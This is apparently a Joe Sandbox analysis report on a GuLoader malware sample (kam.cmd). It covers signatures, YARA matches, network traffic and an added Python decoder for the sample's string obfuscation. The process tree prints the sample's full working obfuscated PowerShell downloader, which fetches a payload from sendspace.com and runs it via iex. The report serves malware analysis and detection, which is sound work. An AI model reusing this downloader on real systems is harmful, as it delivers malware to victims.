Windows Analysis Report
kam.cmd

Overview

General Information

Sample name: kam.cmd
Analysis ID: 1446778
MD5: 37b176c0abc29ec74dede88ced6e4cf1
SHA1: 4aed169208162c12f26dfbe68e94e6781afcc47e
SHA256: 7a5335537efdf7a6becc59c61912dd6b2b56ac7a2e9315b32a0dc3f8ac500fc5
Tags: cmd

Detection

GuLoader
Score: 84
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Yara detected GuLoader
Yara detected Powershell download and execute
Found suspicious powershell code related to unpacking or dynamic code loading
Suspicious powershell command line found
Very long command line found
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • cmd.exe (PID: 5084 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\kam.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 984 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 5256 cmdline: powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. 
p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejrtuHoejetUnchagA.lytnAd esaAti.gwPyr b,Inbr.$Sili.TNaphte Mdepowell,sJubiloParalf i htfSkudaeSe.esnP mpssValid) mr,l ';$Teosoffens=$Bording[0];Billedhuggeren (Hystadens ' Jack$UltragImbo.lAggreoEnf.vb Fyrta ScanlDumpi:SlurbF,ydisoMud ovgangle RbedoMedi l rgehaWi.letandenetrold= Helt(SemicTNonineS.afnsMirkstEurop-Pri,sPAgiosaKalort Triph.nsin Meiop$VelvaTTra,deSa.enoGrithsLate,ochuckf HjemfProtoeLigkinFa.ersNedsn)Do,um ');while (!$Foveolate) {Billedhuggeren (Hystadens 'Bug e$ErkyngArbe.lForsooCholebStormaSwlealClo h:Fj.nthPolsgu UnwisPistabBalbroKollin ,avld.nengr ankeeArbe tNonc =Fejls$Paus tGendirSinuauRustneM lli ') ;Billedhuggeren $Jumped;Billedhuggeren (Hystadens 'PatenS HypotMarkea SporrB ggetP lse-Zit aSNoaltl ,ataeSpongeBenzipBundf Serri4Domme ');Billedhuggeren (Hystadens 'Fremd$ D,sogEfterl OveroZest,bTressaChur,lOplad:,dervFUraadoAmak vSignaeUvennoFr,mslGenlyaPallatConteeh.spa= Cycl(I.rigTFiefdeHypoasRugkit Over-InsecP PrelaData,tParchh Care Ginse$AdeesTMulseeShlepo NedssKnibtoVejr f GlotfKommae,ishtnCh essDrvpa)Grum ') ;Billedhuggeren (Hystadens 'Ihrd $VrelsgL.quilForsvoSan tbUncreaTorywlSamvr: TurbHReaccjArcadr R,ine ,oelaOst.afMckenlNyv,reTalefdMilienartsfiSensinL.fayg Ek,ps Im r=lngde$UnautgZaphrlScrapoBajonbCo,ciaIsognlHo,ot:UdsprFLaxnei.heels S,uakI dfre xumbr Popuigip.nmMembrian.grnForbei MaarsUdbrdt AugueLft.brAmph iIndsteTrol rServenLyoneeVaretsExten+Terre+Firma%Hikha$DllesJMetriaHap ir subsnNon uoMeteo. 
S.utcFetico Bothu AmalnComb,tD.ivb ') ;$Outgnaw=$Jarno[$Hjreaflednings];}$Sanitetsvsenernes=303750;$Rehaul=27249;Billedhuggeren (Hystadens 'Europ$DecimgForunlCellioP.ecob WitnaSrskalAlarm:TyverZOrkidaGa,kanInt gnIndtre RodfsTarmp Diegi=Klods ,remsGOmnumeBarost,ophu-UnsadCpaatroRansanAllo,tBasile Bitrn FifotContu Brnde$ lkreT tandeOme eoprosisAutoboFavorf Polyfs,erteDe ronDermisBri a ');Billedhuggeren (Hystadens 'Ba ca$DriftgPilkolLithooTaksebTilkeaGratil bu i:PelsePUdplarLi.jeo B,igfTestde ubansStngnsSoergi.ftero Disan Plade Lan,l Thor Ascid=Tr kk Mecop[ ymfoS Chefy HooksSpandtFcpaue imebm.arto.H,dadC.iscooAp linSverivRuffle Sungr PraetEfter] Hebr:Disna:,ctinFConterConquo S.bsm ExflB HalvaMe iosVallaebeh.n6 Yndi4Unv sSSucc.tP,eumrInteriPrearnEcphogZ,rib(Refec$.lshaZInviaaFras.n ForsnRosineSan,esQuadr)skram ');Billedhuggeren (Hystadens 'Mrk i$Meditg,kovdlTraveoSamarbSvagsaVe.galPr.pl:FodfoP hretuPrec sManu,s Ar.ylDej,geBilleyDompr Teary=Tameh Defib[Tapr,S HoneyTi,ris ,ksktPari,e ,konmcr,me.BitteTHlereeSchelxU tratRinch.ravnsEFreshnIntercBa ndoHusvidNonreiPoikinSadhegAnili]F.der:Desua:CatadASmkl,SUdklaCGreb.IStvniIIvori.HundeGAkadeeCussetHjlp SHy.tetSpermrArabeiModernM,xomgTre,s(Indek$Li sePPetitrdecreodrevefSvinee D,gosBuk,hszwzriiSuperoEmb,lnRidd e,prdelHovet) Int, ');Billedhuggeren (Hystadens ' regn$prel g OrgilBeclooPageabDykkeaCal,alTrodd:Mi.roPCompuapens pDecadi Ma.grPraamaBuln r ,inakKonsti,ilflvTermi6 P,er1Sover= bea.$PolygPFor,tuXenogs MiddsR.klalSolise Shony Dep . Pes sMorsiuUigenbRlin,sPensutShopbrFiskeiOrnitnrickagDem.r(Topog$Unde.S ommaa.kistn .eski redjtManifeBrne,tPredis ra ivU skrsF lkeeFo,danAgrose.ntrerHebranGal eebackbs ,oci, ,aan$DukseR Op.yeF gbghU.artaSqu ruStbnilco.ro) Loui ');Billedhuggeren $Papirarkiv61;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 4292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 4424 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Tchick.Ite && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
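The obfuscation in the powershell.exe command line above is simple enough to undo, and a decoder is the first thing an analyst wants from this report. The Python below is an added example, not code from the Joe Sandbox report and not the sample's own code. It ports the sample's Hystadens function: with $Kiaki = 1 and $Vaabenmnd built up to 'Substring', the loop keeps every sixth character starting at offset 5 and stops before the last character, so the rest of each literal is filler. Billedhuggeren resolves to &('iex'), so each decoded string is handed to Invoke-Expression. The literals fed to the decoder are copied from the command line; the decode_script and extract_iocs helpers, the regexes and the constructed SCRIPT stand-in are additions. Two caveats about the page's own text: the long $Maimon literal (the Firefox user-agent seen in the GET requests) does not decode cleanly from the report as rendered because repeated spaces inside it were collapsed, so it is left out; and the $Outgnaw literal is broken across two lines, where the example assumes a single space at the break, which is what keeps the stride aligned and yields the sendspace.com URL recorded in the network findings.

```python
"""Decoder for the string obfuscation in the kam.cmd PowerShell stage.

Added example, not code from the Joe Sandbox report or from the sample.
The sample's Hystadens function, with $Kiaki = 1 and $Vaabenmnd =
'Substring', keeps every sixth character starting at offset 5 and stops
before the last character; everything else in the literal is filler.
"""
import re


def hystadens(blob, start=5, stride=6):
    """Port of Hystadens: pick blob[start], blob[start+stride], ... while the
    index stays below len(blob) - 1 ($Kortende = $Rivalled.Length - $Kiaki)."""
    end = len(blob) - 1
    return "".join(blob[i] for i in range(start, end, stride))


# Obfuscated literals copied from the powershell.exe command line in the
# process tree. The long $Maimon user-agent literal is left out because the
# report rendering collapsed repeated spaces inside it, which breaks the stride.
SAMPLES = {
    "Cleanlier245": " overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ",
    "Kragerede": "Proph>Knuck ",
    "Searchlights": " genni AfteeTr,nsxOutto ",
    "Unvision": (
        "finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.erca"
        "OverbtDaab,aIrous% ,eds\\cam uT TelecRecr,h Non,i laskcResi.kSanit."
        "El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteo"
        "Habuk Th nkt Epis "
    ),
    # The report breaks this literal across two lines after "Ta.r. ". A single
    # space at the break is an assumption: one character keeps the 6-byte
    # stride aligned, and the result matches the GET request in the report.
    "Outgnaw": (
        " .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. "
        "H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio"
        " MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicm"
        "shivo6FjernqSlagtcPhilt "
    ),
}

# Constructed stand-in for the real command line: the same literals wired up
# the way the sample does it ($Name=Hystadens '...'), joined with ';'.
SCRIPT = ";".join("${}=Hystadens '{}'".format(n, b) for n, b in SAMPLES.items())

# `$Name = Hystadens '<blob>'`; the assignment part is optional so that nested
# uses such as Billedhuggeren (Hystadens '...') are picked up as well.
_CALL = re.compile(r"(?:\$(\w+)\s*=\s*)?Hystadens\s+'([^']*)'")
_URL = re.compile(r"https?://[^\s'\"<>]+")
_ENV_PATH = re.compile(r"%\w+%\\[^\s&|]+")


def decode_script(script):
    """Return [(variable name or '<anon>', decoded string)] for every
    Hystadens literal found in a script, in source order."""
    return [(name or "<anon>", hystadens(blob)) for name, blob in _CALL.findall(script)]


def extract_iocs(decoded):
    """Pull URLs and %VAR%-relative paths out of the decoded strings."""
    texts = [s for _, s in decoded]
    return {
        "urls": sorted({u for s in texts for u in _URL.findall(s)}),
        "paths": sorted({p for s in texts for p in _ENV_PATH.findall(s)}),
    }


if __name__ == "__main__":
    decoded = decode_script(SCRIPT)
    for name, value in decoded:
        print("{:>14} = {!r}".format(name, value))
    print(extract_iocs(decoded))
```

Run against the constructed SCRIPT this yields User-Agent, >, iex, the echo command that names %appdata%\Tchick.Ite (the file the report records under "File created"), and https://www.sendspace.com/pro/dl/ogm6qc (the first GET in the network findings). To decode a fresh command line, paste it into decode_script; the only constants in the scheme are the start offset and the stride, which is why hystadens exposes both.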
Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
Source: 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_5 | Description: Yara detected GuLoader | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 5256 | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: Process Memory Space: powershell.exe PID: 5256 | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
      • 0xd5704:$b2: ::FromBase64String(
      • 0xd5740:$b2: ::FromBase64String(
      • 0xd577d:$b2: ::FromBase64String(
      • 0xd57bb:$b2: ::FromBase64String(
      • 0xd57fa:$b2: ::FromBase64String(
      • 0xd583a:$b2: ::FromBase64String(
      • 0xd587b:$b2: ::FromBase64String(
      • 0xd58bd:$b2: ::FromBase64String(
      • 0xd5900:$b2: ::FromBase64String(
      • 0x304075:$b2: ::FromBase64String(
      • 0xb276:$s1: -join
      • 0x1834b:$s1: -join
      • 0x1b71d:$s1: -join
      • 0x1bdcf:$s1: -join
      • 0x1d8c0:$s1: -join
      • 0x1fac6:$s1: -join
      • 0x202ed:$s1: -join
      • 0x20b5d:$s1: -join
      • 0x21298:$s1: -join
      • 0x212ca:$s1: -join
      • 0x21312:$s1: -join
Source: amsi64_5256.amsi.csv | Rule: JoeSecurity_PowershellDownloadAndExecute | Description: Yara detected Powershell download and execute | Author: Joe Security
Source: amsi64_5256.amsi.csv | Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen | Strings:
        • 0xe043:$b2: ::FromBase64String(
        • 0xd09a:$s1: -join
        • 0x6846:$s4: +=
        • 0x6908:$s4: +=
        • 0xab2f:$s4: +=
        • 0xcc4c:$s4: +=
        • 0xcf36:$s4: +=
        • 0xd07c:$s4: +=
        • 0xf4ff:$s4: +=
        • 0xf57f:$s4: +=
        • 0xf645:$s4: +=
        • 0xf6c5:$s4: +=
        • 0xf89b:$s4: +=
        • 0xf91f:$s4: +=
        • 0xd850:$e4: Get-WmiObject
        • 0xda3f:$e4: Get-Process
        • 0xda97:$e4: Start-Process

        System Summary

        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: powershell.exe -windowstyle hidden "$Kiaki = 1;$Vaabenmnd='Sub';$Vaabenmnd+='strin';$Vaabenmnd+='g';Function Hystadens($Rivalled){$Kortende=$Rivalled.Length-$Kiaki;For($Ransagningskendelsens=5;$Ransagningskendelsens -lt $Kortende;$Ransagningskendelsens+=6){$Indervrelses+=$Rivalled.$Vaabenmnd.Invoke( $Ransagningskendelsens, $Kiaki);}$Indervrelses;}function Billedhuggeren($Dmpningsfaktorernes){&($Searchlights) ($Dmpningsfaktorernes);}$Maimon=Hystadens 'skurvMSekuno Ko,tzplotti Carbl linelAdkvaaKommu/Super5ov,rl. Stje0un ud Karma( .ropWWagwiiPyruvnSyfildTelefoMultiwbrk.osUnpau artiN FibuT orma f,rly1Sj.eg0D,spe. heda0 Loya;A,fot GramWU.kamiStudin Poli6Skatt4Hoard;Bagst Svi.ex Klem6 Sale4Ambis; ,res .onocrFedervFasci:An,at1Nords2.tent1Doven.oopho0Frkap)Co cl ReturGTampoeSn,escSundhk krifocentr/Kigho2 .ooc0Radio1Mo.kr0Merce0Cents1Engol0 nthr1Leuco sn.sFKundsiMy,omr MicreVeterfOptimoLyst xR,pag/ ,xam1Knipl2 Sloo1Thwar. rore0 Trus ';$Cleanlier245=Hystadens ' overU Sam,sStangefi.dyrSta n-C,ookAHamarg nstaeSnavenPrecotisoan ';$Outgnaw=Hystadens ' .redhHaematsnappt Svkkp DiplsYe.rn:Recip/.edtp/Aa dvwS rafwsp,rtw Ta.r. 
H,lbsAntileEjendnUgunsdH ssesSockhpDuo eaiac.hcSe,sieCockm.Dand,cTe.rio MostmPaleo/S ubopUnvolrA.totoBeton/Gstg d R.sll .nsa/Intero eriegSemicmshivo6FjernqSlagtcPhilt ';$Kragerede=Hystadens 'Proph>Knuck ';$Searchlights=Hystadens ' genni AfteeTr,nsxOutto ';$Eradicated='Tj';$Unvision = Hystadens 'finaneUpayacFrotth nonvoS.bma Balsa%Mise aCamoupUnd,spFor,jdO.ercaOverbtDaab,aIrous% ,eds\cam uT TelecRecr,h Non,i laskcResi.kSanit.El phITena.tTrkvoeXylog Pla i& Benm&Foreg Tur.ueTillbcungulhCliteoHabuk Th nkt Epis ';Billedhuggeren (Hystadens ' Trde$AnnamgVin alvoldto Sul,b .orka .elilSting:GraphBSpasmoUdbl r Acrad.uldsi,eerbnSpatlgS.sed= Su a(BuffwcFro bmXylogdSagvo Primr/DobbecEksdi Drugg$DekleULmarkn Jun.vMuslii VentsBekl.iRut foRigkenGeoem)No di ');Billedhuggeren (Hystadens 'Manip$ paitgHyperl.nedkoPetrobP,epra ydrolI.ter:D lesJtenora.ransr AsienMang.oNg,el=A,sin$TerraOReuneuLabyrt E engnonvenG isoaBullfwT ngh.Engels.emoupGaperlTelefiZolaet Anlg( Pla.$Unf oKPr,rerDisora.ftergLys ieBism,rSlambeHipbodChople .ass) Incu ');$Outgnaw=$Jarno[0];$Cardiospermum= (Hystadens '.isas$UnanigProbalKart oS,inebmi,rea,lerflRetic:RulleSReinseOpslucSt rerEudioeLleuft PortsArbit=YahunN EpiteGala wLamfl-ForglO TilkbCl doj flogeArgotcU.yret Kvle ModarSPrivayfyldesReckotNyctaeInformsamme. unmuNkomm,eRelattPrein.Op.trWbombee Va.sbFjernCNoncolCabuliTroldeUncomnHomoet');$Cardiospermum+=$Bording[1];Billedhuggeren ($Cardiospermum);Billedhuggeren (Hystadens 'Outga$StenoSTurfieKod.scP,ixnr ontreR.tactHyd.osCauli. p.cnHharcee Smaga,olysdFloveeDomparAnalesPeize[M rge$.ndekCLgteslFrem,eindtraCloddnLo qulPorcuiNo voeAlacrrNonte2 Tols4 Ante5redni] Syld=campe$MeccaM Fraga,ilgaiLargemYo.kloJ.rdfnMel,e ');$Jumped=Hystadens 'Genn,$OctacSTraade Unsuc TarbrFirmaePhysitNyskasBoo.t.AfvrgDHankaoJust,wArtisn CalylCremaoA.kylaDryerdNonbuFNedgjiBeskrlSvigeeSemif( Ar,f$Sa.meOVejr
        No Snort rule has matched


        AV Detection

Source: http://pesterbdd.com/images/Pester.png | URL Reputation: Label: malware (this URL is the icon link from the manifest of the Pester module that ships with Windows PowerShell; it is found in powershell.exe memory next to the other Pester, Apache-license, nuget.org and contoso.com manifest strings listed below and is module metadata rather than an indicator of this sample, so the "Antivirus detection for URL or domain" signature should be weighed accordingly)
Source: unknown | HTTPS traffic detected: 172.67.170.105:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 69.31.136.53:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdbID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000002.00000002.2120457233.00000289A2A3C000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: Qib.pdb[ source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: ion.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD96000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: m.Core.pdbL source: powershell.exe, 00000002.00000002.2147314316.00000289BCBBE000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: embly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: *on.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2149102910.00000289BCD34000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: Joe Sandbox View | IP Address: 172.67.170.105
Source: Joe Sandbox View | IP Address: 69.31.136.53
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /pro/dl/ogm6qc HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: www.sendspace.com | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso HTTP/1.1 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0 | Host: fs12n5.sendspace.com | Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported three times)
Source: global traffic | DNS traffic detected: DNS query: www.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: fs12n5.sendspace.com
Source: global traffic | DNS traffic detected: DNS query: 50.23.12.20.in-addr.arpa
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67E1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://fs12n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4A01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs12n5.sendspaX
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs12n5.sendspace.com
Source: powershell.exe, 00000002.00000002.2120955065.00000289A67CE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67A9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E95000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A67CA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E91000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fs12n5.sendspace.com/dlpro/6afd7b9629aca833864bae4c7487d4d4/664f9301/ogm6qc/Potentialet.mso
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2120955065.00000289A5DDC000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.2139881223.00000289B4A73000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2120955065.00000289A62C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2120955065.00000289A4E3B000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com
Source: powershell.exe, 00000002.00000002.2120955065.00000289A4C2D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.sendspace.com/pro/dl/ogm6qcP
Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

        System Summary

Source: amsi64_5256.amsi.csv, type: OTHER | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 5256, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | Author: ditekSHen
Source: C:\Windows\System32\cmd.exe | Process created: Commandline size = 6192
Source: amsi64_5256.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
